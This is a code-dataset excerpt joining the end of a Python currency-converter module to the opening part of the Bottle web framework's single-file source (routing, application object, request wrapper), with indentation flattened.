month = int(iso_str[5:7])
day = int(iso_str[8:10])
return datetime.date(year, month, day)
def take_closest(myList, myNumber):
# Source: http://stackoverflow.com/a/12141511
"""
Assumes myList is sorted. Returns closest value to myNumber.
If two numbers are equally close, return the smallest number.
"""
pos = bisect_left(myList, myNumber)
if pos == 0:
return myList[0]
if pos == len(myList):
return myList[-1]
before = myList[pos - 1]
after = myList[pos]
if after - myNumber < myNumber - before:
return after
else:
return before
class CurrencyConverter(object):
def __init__(self, update=False, source=False):
def load_rates():
"""
Read CSV file as generator function
"""
if self.source is False:
resource_package = __name__
resource_path = 'consolidated_rates.csv'
source = pkg_resources.resource_filename(
resource_package, resource_path)
if update is True:
get_rates.update_rates(source)
with open(self.source, "rU") as data:
csv_reader = csv.reader(data)
next(csv_reader)
for row in csv_reader:
yield row
def make_rates(rates_list):
"""
Sort rates into nice dictionary of currency: dates
"""
def append_path(root, paths):
root.setdefault(paths[0], {})
root[paths[0]].update(paths[1])
return root
rates_dates = {}
for row in rates_list:
rates_dates = append_path(
rates_dates,
(row[2], {make_date_from_iso(row[0]): float(row[1])}))
currencies_dates = dict(map(lambda currency:
(currency, sorted(list(rates_dates[currency]))),
rates_dates.keys()))
return currencies_dates, rates_dates
self.source = source
self.currencies_dates, self.dates_rates = make_rates(load_rates())
def known_currencies(self):
return ",".join(sorted(self.currencies_dates.keys()))
def closest_rate(self, currency, date):
"""
Accepts a list with (currency, date)
returns currency, date, conversion date, exchange rate
"""
if currency == u"USD":
return {"closest_date": date, "conversion_rate": 1.0}
try:
the_date = take_closest(self.currencies_dates[currency], date)
return {
"closest_date": the_date,
"conversion_rate": self.dates_rates[currency][the_date]
}
except KeyError:
msg = "Unknown currency: {}".format(currency)
raise UnknownCurrencyException(msg)
if __name__ == "__main__":
"""
Example output
"""
converter = CurrencyConverter(update=True)
print("Available currencies: {}".format(converter.known_currencies()))
print(converter.closest_rate("USD", datetime.date(2012, 7, 20)))
print(converter.closest_rate("EUR", datetime.date(2014, 7, 20)))
print(converter.closest_rate("EUR", datetime.date(2014, 7, 20)))
| mit | -6,793,993,681,324,983,000 | 30.821429 | 76 | 0.561167 | false |
fboender/jerrybuild | jerrybuild/bottle.py | 8 | 150580 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Bottle is a fast and simple micro-framework for small web applications. It
offers request dispatching (Routes) with url parameter support, templates,
a built-in HTTP Server and adapters for many third party WSGI/HTTP-server and
template engines - all in a single file and with no dependencies other than the
Python Standard Library.
Homepage and documentation: http://bottlepy.org/
Copyright (c) 2016, Marcel Hellkamp.
License: MIT (see LICENSE for details)
"""
from __future__ import with_statement
__author__ = 'Marcel Hellkamp'
__version__ = '0.12.18'
__license__ = 'MIT'
# The gevent server adapter needs to patch some modules before they are imported
# This is why we parse the commandline parameters here but handle them later
if __name__ == '__main__':
from optparse import OptionParser
_cmd_parser = OptionParser(usage="usage: %prog [options] package.module:app")
_opt = _cmd_parser.add_option
_opt("--version", action="store_true", help="show version number.")
_opt("-b", "--bind", metavar="ADDRESS", help="bind socket to ADDRESS.")
_opt("-s", "--server", default='wsgiref', help="use SERVER as backend.")
_opt("-p", "--plugin", action="append", help="install additional plugin/s.")
_opt("--debug", action="store_true", help="start server in debug mode.")
_opt("--reload", action="store_true", help="auto-reload on file changes.")
_cmd_options, _cmd_args = _cmd_parser.parse_args()
if _cmd_options.server and _cmd_options.server.startswith('gevent'):
import gevent.monkey; gevent.monkey.patch_all()
import base64, cgi, email.utils, functools, hmac, itertools, mimetypes,\
os, re, subprocess, sys, tempfile, threading, time, warnings, hashlib
from datetime import date as datedate, datetime, timedelta
from tempfile import TemporaryFile
from traceback import format_exc, print_exc
from inspect import getargspec
from unicodedata import normalize
try: from simplejson import dumps as json_dumps, loads as json_lds
except ImportError: # pragma: no cover
try: from json import dumps as json_dumps, loads as json_lds
except ImportError:
try: from django.utils.simplejson import dumps as json_dumps, loads as json_lds
except ImportError:
def json_dumps(data):
raise ImportError("JSON support requires Python 2.6 or simplejson.")
json_lds = json_dumps
# We now try to fix 2.5/2.6/3.1/3.2 incompatibilities.
# It ain't pretty but it works... Sorry for the mess.
py = sys.version_info
py3k = py >= (3, 0, 0)
py25 = py < (2, 6, 0)
py31 = (3, 1, 0) <= py < (3, 2, 0)
# Workaround for the missing "as" keyword in py3k.
def _e(): return sys.exc_info()[1]
# Workaround for the "print is a keyword/function" Python 2/3 dilemma
# and a fallback for mod_wsgi (resticts stdout/err attribute access)
try:
_stdout, _stderr = sys.stdout.write, sys.stderr.write
except IOError:
_stdout = lambda x: sys.stdout.write(x)
_stderr = lambda x: sys.stderr.write(x)
# Lots of stdlib and builtin differences.
if py3k:
import http.client as httplib
import _thread as thread
from urllib.parse import urljoin, SplitResult as UrlSplitResult
from urllib.parse import urlencode, quote as urlquote, unquote as urlunquote
urlunquote = functools.partial(urlunquote, encoding='latin1')
from http.cookies import SimpleCookie
if py >= (3, 3, 0):
from collections.abc import MutableMapping as DictMixin
from types import ModuleType as new_module
else:
from collections import MutableMapping as DictMixin
from imp import new_module
import pickle
from io import BytesIO
from configparser import ConfigParser
basestring = str
unicode = str
json_loads = lambda s: json_lds(touni(s))
callable = lambda x: hasattr(x, '__call__')
imap = map
def _raise(*a): raise a[0](a[1]).with_traceback(a[2])
else: # 2.x
import httplib
import thread
from urlparse import urljoin, SplitResult as UrlSplitResult
from urllib import urlencode, quote as urlquote, unquote as urlunquote
from Cookie import SimpleCookie
from itertools import imap
import cPickle as pickle
from imp import new_module
from StringIO import StringIO as BytesIO
from ConfigParser import SafeConfigParser as ConfigParser
if py25:
msg = "Python 2.5 support may be dropped in future versions of Bottle."
warnings.warn(msg, DeprecationWarning)
from UserDict import DictMixin
def next(it): return it.next()
bytes = str
else: # 2.6, 2.7
from collections import MutableMapping as DictMixin
unicode = unicode
json_loads = json_lds
eval(compile('def _raise(*a): raise a[0], a[1], a[2]', '<py3fix>', 'exec'))
# Some helpers for string/byte handling
def tob(s, enc='utf8'):
return s.encode(enc) if isinstance(s, unicode) else bytes(s)
def touni(s, enc='utf8', err='strict'):
return s.decode(enc, err) if isinstance(s, bytes) else unicode(s)
tonat = touni if py3k else tob
# 3.2 fixes cgi.FieldStorage to accept bytes (which makes a lot of sense).
# 3.1 needs a workaround.
if py31:
from io import TextIOWrapper
class NCTextIOWrapper(TextIOWrapper):
def close(self): pass # Keep wrapped buffer open.
# A bug in functools causes it to break if the wrapper is an instance method
def update_wrapper(wrapper, wrapped, *a, **ka):
try: functools.update_wrapper(wrapper, wrapped, *a, **ka)
except AttributeError: pass
# These helpers are used at module level and need to be defined first.
# And yes, I know PEP-8, but sometimes a lower-case classname makes more sense.
def depr(message, hard=False):
warnings.warn(message, DeprecationWarning, stacklevel=3)
def makelist(data): # This is just to handy
if isinstance(data, (tuple, list, set, dict)): return list(data)
elif data: return [data]
else: return []
class DictProperty(object):
''' Property that maps to a key in a local dict-like attribute. '''
def __init__(self, attr, key=None, read_only=False):
self.attr, self.key, self.read_only = attr, key, read_only
def __call__(self, func):
functools.update_wrapper(self, func, updated=[])
self.getter, self.key = func, self.key or func.__name__
return self
def __get__(self, obj, cls):
if obj is None: return self
key, storage = self.key, getattr(obj, self.attr)
if key not in storage: storage[key] = self.getter(obj)
return storage[key]
def __set__(self, obj, value):
if self.read_only: raise AttributeError("Read-Only property.")
getattr(obj, self.attr)[self.key] = value
def __delete__(self, obj):
if self.read_only: raise AttributeError("Read-Only property.")
del getattr(obj, self.attr)[self.key]
class cached_property(object):
''' A property that is only computed once per instance and then replaces
itself with an ordinary attribute. Deleting the attribute resets the
property. '''
def __init__(self, func):
self.__doc__ = getattr(func, '__doc__')
self.func = func
def __get__(self, obj, cls):
if obj is None: return self
value = obj.__dict__[self.func.__name__] = self.func(obj)
return value
class lazy_attribute(object):
''' A property that caches itself to the class object. '''
def __init__(self, func):
functools.update_wrapper(self, func, updated=[])
self.getter = func
def __get__(self, obj, cls):
value = self.getter(cls)
setattr(cls, self.__name__, value)
return value
###############################################################################
# Exceptions and Events ########################################################
###############################################################################
class BottleException(Exception):
""" A base class for exceptions used by bottle. """
pass
###############################################################################
# Routing ######################################################################
###############################################################################
class RouteError(BottleException):
""" This is a base class for all routing related exceptions """
class RouteReset(BottleException):
""" If raised by a plugin or request handler, the route is reset and all
plugins are re-applied. """
class RouterUnknownModeError(RouteError): pass
class RouteSyntaxError(RouteError):
""" The route parser found something not supported by this router. """
class RouteBuildError(RouteError):
""" The route could not be built. """
def _re_flatten(p):
''' Turn all capturing groups in a regular expression pattern into
non-capturing groups. '''
if '(' not in p: return p
return re.sub(r'(\\*)(\(\?P<[^>]+>|\((?!\?))',
lambda m: m.group(0) if len(m.group(1)) % 2 else m.group(1) + '(?:', p)
class Router(object):
''' A Router is an ordered collection of route->target pairs. It is used to
efficiently match WSGI requests against a number of routes and return
the first target that satisfies the request. The target may be anything,
usually a string, ID or callable object. A route consists of a path-rule
and a HTTP method.
The path-rule is either a static path (e.g. `/contact`) or a dynamic
path that contains wildcards (e.g. `/wiki/<page>`). The wildcard syntax
and details on the matching order are described in docs:`routing`.
'''
default_pattern = '[^/]+'
default_filter = 're'
#: The current CPython regexp implementation does not allow more
#: than 99 matching groups per regular expression.
_MAX_GROUPS_PER_PATTERN = 99
def __init__(self, strict=False):
self.rules = [] # All rules in order
self._groups = {} # index of regexes to find them in dyna_routes
self.builder = {} # Data structure for the url builder
self.static = {} # Search structure for static routes
self.dyna_routes = {}
self.dyna_regexes = {} # Search structure for dynamic routes
#: If true, static routes are no longer checked first.
self.strict_order = strict
self.filters = {
're': lambda conf:
(_re_flatten(conf or self.default_pattern), None, None),
'int': lambda conf: (r'-?\d+', int, lambda x: str(int(x))),
'float': lambda conf: (r'-?[\d.]+', float, lambda x: str(float(x))),
'path': lambda conf: (r'.+?', None, None)}
def add_filter(self, name, func):
''' Add a filter. The provided function is called with the configuration
string as parameter and must return a (regexp, to_python, to_url) tuple.
The first element is a string, the last two are callables or None. '''
self.filters[name] = func
rule_syntax = re.compile('(\\\\*)'\
'(?:(?::([a-zA-Z_][a-zA-Z_0-9]*)?()(?:#(.*?)#)?)'\
'|(?:<([a-zA-Z_][a-zA-Z_0-9]*)?(?::([a-zA-Z_]*)'\
'(?::((?:\\\\.|[^\\\\>]+)+)?)?)?>))')
def _itertokens(self, rule):
offset, prefix = 0, ''
for match in self.rule_syntax.finditer(rule):
prefix += rule[offset:match.start()]
g = match.groups()
if len(g[0])%2: # Escaped wildcard
prefix += match.group(0)[len(g[0]):]
offset = match.end()
continue
if prefix:
yield prefix, None, None
name, filtr, conf = g[4:7] if g[2] is None else g[1:4]
yield name, filtr or 'default', conf or None
offset, prefix = match.end(), ''
if offset <= len(rule) or prefix:
yield prefix+rule[offset:], None, None
def add(self, rule, method, target, name=None):
''' Add a new rule or replace the target for an existing rule. '''
anons = 0 # Number of anonymous wildcards found
keys = [] # Names of keys
pattern = '' # Regular expression pattern with named groups
filters = [] # Lists of wildcard input filters
builder = [] # Data structure for the URL builder
is_static = True
for key, mode, conf in self._itertokens(rule):
if mode:
is_static = False
if mode == 'default': mode = self.default_filter
mask, in_filter, out_filter = self.filters[mode](conf)
if not key:
pattern += '(?:%s)' % mask
key = 'anon%d' % anons
anons += 1
else:
pattern += '(?P<%s>%s)' % (key, mask)
keys.append(key)
if in_filter: filters.append((key, in_filter))
builder.append((key, out_filter or str))
elif key:
pattern += re.escape(key)
builder.append((None, key))
self.builder[rule] = builder
if name: self.builder[name] = builder
if is_static and not self.strict_order:
self.static.setdefault(method, {})
self.static[method][self.build(rule)] = (target, None)
return
try:
re_pattern = re.compile('^(%s)$' % pattern)
re_match = re_pattern.match
except re.error:
raise RouteSyntaxError("Could not add Route: %s (%s)" % (rule, _e()))
if filters:
def getargs(path):
url_args = re_match(path).groupdict()
for name, wildcard_filter in filters:
try:
url_args[name] = wildcard_filter(url_args[name])
except ValueError:
raise HTTPError(400, 'Path has wrong format.')
return url_args
elif re_pattern.groupindex:
def getargs(path):
return re_match(path).groupdict()
else:
getargs = None
flatpat = _re_flatten(pattern)
whole_rule = (rule, flatpat, target, getargs)
if (flatpat, method) in self._groups:
if DEBUG:
msg = 'Route <%s %s> overwrites a previously defined route'
warnings.warn(msg % (method, rule), RuntimeWarning)
self.dyna_routes[method][self._groups[flatpat, method]] = whole_rule
else:
self.dyna_routes.setdefault(method, []).append(whole_rule)
self._groups[flatpat, method] = len(self.dyna_routes[method]) - 1
self._compile(method)
def _compile(self, method):
all_rules = self.dyna_routes[method]
comborules = self.dyna_regexes[method] = []
maxgroups = self._MAX_GROUPS_PER_PATTERN
for x in range(0, len(all_rules), maxgroups):
some = all_rules[x:x+maxgroups]
combined = (flatpat for (_, flatpat, _, _) in some)
combined = '|'.join('(^%s$)' % flatpat for flatpat in combined)
combined = re.compile(combined).match
rules = [(target, getargs) for (_, _, target, getargs) in some]
comborules.append((combined, rules))
def build(self, _name, *anons, **query):
''' Build an URL by filling the wildcards in a rule. '''
builder = self.builder.get(_name)
if not builder: raise RouteBuildError("No route with that name.", _name)
try:
for i, value in enumerate(anons): query['anon%d'%i] = value
url = ''.join([f(query.pop(n)) if n else f for (n,f) in builder])
return url if not query else url+'?'+urlencode(query)
except KeyError:
raise RouteBuildError('Missing URL argument: %r' % _e().args[0])
def match(self, environ):
''' Return a (target, url_agrs) tuple or raise HTTPError(400/404/405). '''
verb = environ['REQUEST_METHOD'].upper()
path = environ['PATH_INFO'] or '/'
target = None
if verb == 'HEAD':
methods = ['PROXY', verb, 'GET', 'ANY']
else:
methods = ['PROXY', verb, 'ANY']
for method in methods:
if method in self.static and path in self.static[method]:
target, getargs = self.static[method][path]
return target, getargs(path) if getargs else {}
elif method in self.dyna_regexes:
for combined, rules in self.dyna_regexes[method]:
match = combined(path)
if match:
target, getargs = rules[match.lastindex - 1]
return target, getargs(path) if getargs else {}
# No matching route found. Collect alternative methods for 405 response
allowed = set([])
nocheck = set(methods)
for method in set(self.static) - nocheck:
if path in self.static[method]:
allowed.add(verb)
for method in set(self.dyna_regexes) - allowed - nocheck:
for combined, rules in self.dyna_regexes[method]:
match = combined(path)
if match:
allowed.add(method)
if allowed:
allow_header = ",".join(sorted(allowed))
raise HTTPError(405, "Method not allowed.", Allow=allow_header)
# No matching route and no alternative method found. We give up
raise HTTPError(404, "Not found: " + repr(path))
class Route(object):
''' This class wraps a route callback along with route specific metadata and
configuration and applies Plugins on demand. It is also responsible for
turing an URL path rule into a regular expression usable by the Router.
'''
def __init__(self, app, rule, method, callback, name=None,
plugins=None, skiplist=None, **config):
#: The application this route is installed to.
self.app = app
#: The path-rule string (e.g. ``/wiki/:page``).
self.rule = rule
#: The HTTP method as a string (e.g. ``GET``).
self.method = method
#: The original callback with no plugins applied. Useful for introspection.
self.callback = callback
#: The name of the route (if specified) or ``None``.
self.name = name or None
#: A list of route-specific plugins (see :meth:`Bottle.route`).
self.plugins = plugins or []
#: A list of plugins to not apply to this route (see :meth:`Bottle.route`).
self.skiplist = skiplist or []
#: Additional keyword arguments passed to the :meth:`Bottle.route`
#: decorator are stored in this dictionary. Used for route-specific
#: plugin configuration and meta-data.
self.config = ConfigDict().load_dict(config, make_namespaces=True)
def __call__(self, *a, **ka):
depr("Some APIs changed to return Route() instances instead of"\
" callables. Make sure to use the Route.call method and not to"\
" call Route instances directly.") #0.12
return self.call(*a, **ka)
@cached_property
def call(self):
''' The route callback with all plugins applied. This property is
created on demand and then cached to speed up subsequent requests.'''
return self._make_callback()
def reset(self):
''' Forget any cached values. The next time :attr:`call` is accessed,
all plugins are re-applied. '''
self.__dict__.pop('call', None)
def prepare(self):
''' Do all on-demand work immediately (useful for debugging).'''
self.call
@property
def _context(self):
depr('Switch to Plugin API v2 and access the Route object directly.') #0.12
return dict(rule=self.rule, method=self.method, callback=self.callback,
name=self.name, app=self.app, config=self.config,
apply=self.plugins, skip=self.skiplist)
def all_plugins(self):
''' Yield all Plugins affecting this route. '''
unique = set()
for p in reversed(self.app.plugins + self.plugins):
if True in self.skiplist: break
name = getattr(p, 'name', False)
if name and (name in self.skiplist or name in unique): continue
if p in self.skiplist or type(p) in self.skiplist: continue
if name: unique.add(name)
yield p
def _make_callback(self):
callback = self.callback
for plugin in self.all_plugins():
try:
if hasattr(plugin, 'apply'):
api = getattr(plugin, 'api', 1)
context = self if api > 1 else self._context
callback = plugin.apply(callback, context)
else:
callback = plugin(callback)
except RouteReset: # Try again with changed configuration.
return self._make_callback()
if not callback is self.callback:
update_wrapper(callback, self.callback)
return callback
def get_undecorated_callback(self):
''' Return the callback. If the callback is a decorated function, try to
recover the original function. '''
func = self.callback
func = getattr(func, '__func__' if py3k else 'im_func', func)
closure_attr = '__closure__' if py3k else 'func_closure'
while hasattr(func, closure_attr) and getattr(func, closure_attr):
func = getattr(func, closure_attr)[0].cell_contents
return func
def get_callback_args(self):
''' Return a list of argument names the callback (most likely) accepts
as keyword arguments. If the callback is a decorated function, try
to recover the original function before inspection. '''
return getargspec(self.get_undecorated_callback())[0]
def get_config(self, key, default=None):
''' Lookup a config field and return its value, first checking the
route.config, then route.app.config.'''
for conf in (self.config, self.app.conifg):
if key in conf: return conf[key]
return default
def __repr__(self):
cb = self.get_undecorated_callback()
return '<%s %r %r>' % (self.method, self.rule, cb)
###############################################################################
# Application Object ###########################################################
###############################################################################
class Bottle(object):
""" Each Bottle object represents a single, distinct web application and
consists of routes, callbacks, plugins, resources and configuration.
Instances are callable WSGI applications.
:param catchall: If true (default), handle all exceptions. Turn off to
let debugging middleware handle exceptions.
"""
def __init__(self, catchall=True, autojson=True):
#: A :class:`ConfigDict` for app specific configuration.
self.config = ConfigDict()
self.config._on_change = functools.partial(self.trigger_hook, 'config')
self.config.meta_set('autojson', 'validate', bool)
self.config.meta_set('catchall', 'validate', bool)
self.config['catchall'] = catchall
self.config['autojson'] = autojson
#: A :class:`ResourceManager` for application files
self.resources = ResourceManager()
self.routes = [] # List of installed :class:`Route` instances.
self.router = Router() # Maps requests to :class:`Route` instances.
self.error_handler = {}
# Core plugins
self.plugins = [] # List of installed plugins.
if self.config['autojson']:
self.install(JSONPlugin())
self.install(TemplatePlugin())
#: If true, most exceptions are caught and returned as :exc:`HTTPError`
catchall = DictProperty('config', 'catchall')
__hook_names = 'before_request', 'after_request', 'app_reset', 'config'
__hook_reversed = 'after_request'
@cached_property
def _hooks(self):
return dict((name, []) for name in self.__hook_names)
def add_hook(self, name, func):
''' Attach a callback to a hook. Three hooks are currently implemented:
before_request
Executed once before each request. The request context is
available, but no routing has happened yet.
after_request
Executed once after each request regardless of its outcome.
app_reset
Called whenever :meth:`Bottle.reset` is called.
'''
if name in self.__hook_reversed:
self._hooks[name].insert(0, func)
else:
self._hooks[name].append(func)
def remove_hook(self, name, func):
''' Remove a callback from a hook. '''
if name in self._hooks and func in self._hooks[name]:
self._hooks[name].remove(func)
return True
def trigger_hook(self, __name, *args, **kwargs):
''' Trigger a hook and return a list of results. '''
return [hook(*args, **kwargs) for hook in self._hooks[__name][:]]
def hook(self, name):
""" Return a decorator that attaches a callback to a hook. See
:meth:`add_hook` for details."""
def decorator(func):
self.add_hook(name, func)
return func
return decorator
def mount(self, prefix, app, **options):
''' Mount an application (:class:`Bottle` or plain WSGI) to a specific
URL prefix. Example::
root_app.mount('/admin/', admin_app)
:param prefix: path prefix or `mount-point`. If it ends in a slash,
that slash is mandatory.
:param app: an instance of :class:`Bottle` or a WSGI application.
All other parameters are passed to the underlying :meth:`route` call.
'''
if isinstance(app, basestring):
depr('Parameter order of Bottle.mount() changed.', True) # 0.10
segments = [p for p in prefix.split('/') if p]
if not segments: raise ValueError('Empty path prefix.')
path_depth = len(segments)
def mountpoint_wrapper():
try:
request.path_shift(path_depth)
rs = HTTPResponse([])
def start_response(status, headerlist, exc_info=None):
if exc_info:
try:
_raise(*exc_info)
finally:
exc_info = None
rs.status = status
for name, value in headerlist: rs.add_header(name, value)
return rs.body.append
body = app(request.environ, start_response)
if body and rs.body: body = itertools.chain(rs.body, body)
rs.body = body or rs.body
return rs
finally:
request.path_shift(-path_depth)
options.setdefault('skip', True)
options.setdefault('method', 'PROXY')
options.setdefault('mountpoint', {'prefix': prefix, 'target': app})
options['callback'] = mountpoint_wrapper
self.route('/%s/<:re:.*>' % '/'.join(segments), **options)
if not prefix.endswith('/'):
self.route('/' + '/'.join(segments), **options)
def merge(self, routes):
''' Merge the routes of another :class:`Bottle` application or a list of
:class:`Route` objects into this application. The routes keep their
'owner', meaning that the :data:`Route.app` attribute is not
changed. '''
if isinstance(routes, Bottle):
routes = routes.routes
for route in routes:
self.add_route(route)
def install(self, plugin):
''' Add a plugin to the list of plugins and prepare it for being
applied to all routes of this application. A plugin may be a simple
decorator or an object that implements the :class:`Plugin` API.
'''
if hasattr(plugin, 'setup'): plugin.setup(self)
if not callable(plugin) and not hasattr(plugin, 'apply'):
raise TypeError("Plugins must be callable or implement .apply()")
self.plugins.append(plugin)
self.reset()
return plugin
def uninstall(self, plugin):
''' Uninstall plugins. Pass an instance to remove a specific plugin, a type
object to remove all plugins that match that type, a string to remove
all plugins with a matching ``name`` attribute or ``True`` to remove all
plugins. Return the list of removed plugins. '''
removed, remove = [], plugin
for i, plugin in list(enumerate(self.plugins))[::-1]:
if remove is True or remove is plugin or remove is type(plugin) \
or getattr(plugin, 'name', True) == remove:
removed.append(plugin)
del self.plugins[i]
if hasattr(plugin, 'close'): plugin.close()
if removed: self.reset()
return removed
def reset(self, route=None):
''' Reset all routes (force plugins to be re-applied) and clear all
caches. If an ID or route object is given, only that specific route
is affected. '''
if route is None: routes = self.routes
elif isinstance(route, Route): routes = [route]
else: routes = [self.routes[route]]
for route in routes: route.reset()
if DEBUG:
for route in routes: route.prepare()
self.trigger_hook('app_reset')
def close(self):
''' Close the application and all installed plugins. '''
for plugin in self.plugins:
if hasattr(plugin, 'close'): plugin.close()
self.stopped = True
def run(self, **kwargs):
''' Calls :func:`run` with the same parameters. '''
run(self, **kwargs)
def match(self, environ):
""" Search for a matching route and return a (:class:`Route` , urlargs)
tuple. The second value is a dictionary with parameters extracted
from the URL. Raise :exc:`HTTPError` (404/405) on a non-match."""
return self.router.match(environ)
def get_url(self, routename, **kargs):
""" Return a string that matches a named route """
scriptname = request.environ.get('SCRIPT_NAME', '').strip('/') + '/'
location = self.router.build(routename, **kargs).lstrip('/')
return urljoin(urljoin('/', scriptname), location)
def add_route(self, route):
''' Add a route object, but do not change the :data:`Route.app`
attribute.'''
self.routes.append(route)
self.router.add(route.rule, route.method, route, name=route.name)
if DEBUG: route.prepare()
def route(self, path=None, method='GET', callback=None, name=None,
apply=None, skip=None, **config):
""" A decorator to bind a function to a request URL. Example::
@app.route('/hello/:name')
def hello(name):
return 'Hello %s' % name
The ``:name`` part is a wildcard. See :class:`Router` for syntax
details.
:param path: Request path or a list of paths to listen to. If no
path is specified, it is automatically generated from the
signature of the function.
:param method: HTTP method (`GET`, `POST`, `PUT`, ...) or a list of
methods to listen to. (default: `GET`)
:param callback: An optional shortcut to avoid the decorator
syntax. ``route(..., callback=func)`` equals ``route(...)(func)``
:param name: The name for this route. (default: None)
:param apply: A decorator or plugin or a list of plugins. These are
applied to the route callback in addition to installed plugins.
:param skip: A list of plugins, plugin classes or names. Matching
plugins are not installed to this route. ``True`` skips all.
Any additional keyword arguments are stored as route-specific
configuration and passed to plugins (see :meth:`Plugin.apply`).
"""
if callable(path): path, callback = None, path
plugins = makelist(apply)
skiplist = makelist(skip)
def decorator(callback):
# TODO: Documentation and tests
if isinstance(callback, basestring): callback = load(callback)
for rule in makelist(path) or yieldroutes(callback):
for verb in makelist(method):
verb = verb.upper()
route = Route(self, rule, verb, callback, name=name,
plugins=plugins, skiplist=skiplist, **config)
self.add_route(route)
return callback
return decorator(callback) if callback else decorator
def get(self, path=None, method='GET', **options):
""" Equals :meth:`route`. """
return self.route(path, method, **options)
def post(self, path=None, method='POST', **options):
""" Equals :meth:`route` with a ``POST`` method parameter. """
return self.route(path, method, **options)
def put(self, path=None, method='PUT', **options):
""" Equals :meth:`route` with a ``PUT`` method parameter. """
return self.route(path, method, **options)
def delete(self, path=None, method='DELETE', **options):
""" Equals :meth:`route` with a ``DELETE`` method parameter. """
return self.route(path, method, **options)
def error(self, code=500):
""" Decorator: Register an output handler for a HTTP error code"""
def wrapper(handler):
self.error_handler[int(code)] = handler
return handler
return wrapper
def default_error_handler(self, res):
return tob(template(ERROR_PAGE_TEMPLATE, e=res))
def _handle(self, environ):
path = environ['bottle.raw_path'] = environ['PATH_INFO']
if py3k:
try:
environ['PATH_INFO'] = path.encode('latin1').decode('utf8')
except UnicodeError:
return HTTPError(400, 'Invalid path string. Expected UTF-8')
try:
environ['bottle.app'] = self
request.bind(environ)
response.bind()
try:
self.trigger_hook('before_request')
route, args = self.router.match(environ)
environ['route.handle'] = route
environ['bottle.route'] = route
environ['route.url_args'] = args
return route.call(**args)
finally:
self.trigger_hook('after_request')
except HTTPResponse:
return _e()
except RouteReset:
route.reset()
return self._handle(environ)
except (KeyboardInterrupt, SystemExit, MemoryError):
raise
except Exception:
if not self.catchall: raise
stacktrace = format_exc()
environ['wsgi.errors'].write(stacktrace)
return HTTPError(500, "Internal Server Error", _e(), stacktrace)
def _cast(self, out, peek=None):
""" Try to convert the parameter into something WSGI compatible and set
correct HTTP headers when possible.
Support: False, str, unicode, dict, HTTPResponse, HTTPError, file-like,
iterable of strings and iterable of unicodes
"""
# Empty output is done here
if not out:
if 'Content-Length' not in response:
response['Content-Length'] = 0
return []
# Join lists of byte or unicode strings. Mixed lists are NOT supported
if isinstance(out, (tuple, list))\
and isinstance(out[0], (bytes, unicode)):
out = out[0][0:0].join(out) # b'abc'[0:0] -> b''
# Encode unicode strings
if isinstance(out, unicode):
out = out.encode(response.charset)
# Byte Strings are just returned
if isinstance(out, bytes):
if 'Content-Length' not in response:
response['Content-Length'] = len(out)
return [out]
# HTTPError or HTTPException (recursive, because they may wrap anything)
# TODO: Handle these explicitly in handle() or make them iterable.
if isinstance(out, HTTPError):
out.apply(response)
out = self.error_handler.get(out.status_code, self.default_error_handler)(out)
return self._cast(out)
if isinstance(out, HTTPResponse):
out.apply(response)
return self._cast(out.body)
# File-like objects.
if hasattr(out, 'read'):
if 'wsgi.file_wrapper' in request.environ:
return request.environ['wsgi.file_wrapper'](out)
elif hasattr(out, 'close') or not hasattr(out, '__iter__'):
return WSGIFileWrapper(out)
# Handle Iterables. We peek into them to detect their inner type.
try:
iout = iter(out)
first = next(iout)
while not first:
first = next(iout)
except StopIteration:
return self._cast('')
except HTTPResponse:
first = _e()
except (KeyboardInterrupt, SystemExit, MemoryError):
raise
except Exception:
if not self.catchall: raise
first = HTTPError(500, 'Unhandled exception', _e(), format_exc())
# These are the inner types allowed in iterator or generator objects.
if isinstance(first, HTTPResponse):
return self._cast(first)
elif isinstance(first, bytes):
new_iter = itertools.chain([first], iout)
elif isinstance(first, unicode):
encoder = lambda x: x.encode(response.charset)
new_iter = imap(encoder, itertools.chain([first], iout))
else:
msg = 'Unsupported response type: %s' % type(first)
return self._cast(HTTPError(500, msg))
if hasattr(out, 'close'):
new_iter = _closeiter(new_iter, out.close)
return new_iter
def wsgi(self, environ, start_response):
""" The bottle WSGI-interface. """
try:
out = self._cast(self._handle(environ))
# rfc2616 section 4.3
if response._status_code in (100, 101, 204, 304)\
or environ['REQUEST_METHOD'] == 'HEAD':
if hasattr(out, 'close'): out.close()
out = []
start_response(response._status_line, response.headerlist)
return out
except (KeyboardInterrupt, SystemExit, MemoryError):
raise
except Exception:
if not self.catchall: raise
err = '<h1>Critical error while processing request: %s</h1>' \
% html_escape(environ.get('PATH_INFO', '/'))
if DEBUG:
err += '<h2>Error:</h2>\n<pre>\n%s\n</pre>\n' \
'<h2>Traceback:</h2>\n<pre>\n%s\n</pre>\n' \
% (html_escape(repr(_e())), html_escape(format_exc()))
environ['wsgi.errors'].write(err)
headers = [('Content-Type', 'text/html; charset=UTF-8')]
start_response('500 INTERNAL SERVER ERROR', headers, sys.exc_info())
return [tob(err)]
def __call__(self, environ, start_response):
''' Each instance of :class:'Bottle' is a WSGI application. '''
return self.wsgi(environ, start_response)
###############################################################################
# HTTP and WSGI Tools ##########################################################
###############################################################################
class BaseRequest(object):
""" A wrapper for WSGI environment dictionaries that adds a lot of
convenient access methods and properties. Most of them are read-only.
Adding new attributes to a request actually adds them to the environ
dictionary (as 'bottle.request.ext.<name>'). This is the recommended
way to store and access request-specific data.
"""
__slots__ = ('environ')
#: Maximum size of memory buffer for :attr:`body` in bytes.
MEMFILE_MAX = 102400
def __init__(self, environ=None):
""" Wrap a WSGI environ dictionary. """
#: The wrapped WSGI environ dictionary. This is the only real attribute.
#: All other attributes actually are read-only properties.
self.environ = {} if environ is None else environ
self.environ['bottle.request'] = self
@DictProperty('environ', 'bottle.app', read_only=True)
def app(self):
''' Bottle application handling this request. '''
raise RuntimeError('This request is not connected to an application.')
@DictProperty('environ', 'bottle.route', read_only=True)
def route(self):
""" The bottle :class:`Route` object that matches this request. """
raise RuntimeError('This request is not connected to a route.')
@DictProperty('environ', 'route.url_args', read_only=True)
def url_args(self):
""" The arguments extracted from the URL. """
raise RuntimeError('This request is not connected to a route.')
@property
def path(self):
''' The value of ``PATH_INFO`` with exactly one prefixed slash (to fix
broken clients and avoid the "empty path" edge case). '''
return '/' + self.environ.get('PATH_INFO','').lstrip('/')
@property
def method(self):
''' The ``REQUEST_METHOD`` value as an uppercase string. '''
return self.environ.get('REQUEST_METHOD', 'GET').upper()
@DictProperty('environ', 'bottle.request.headers', read_only=True)
def headers(self):
''' A :class:`WSGIHeaderDict` that provides case-insensitive access to
HTTP request headers. '''
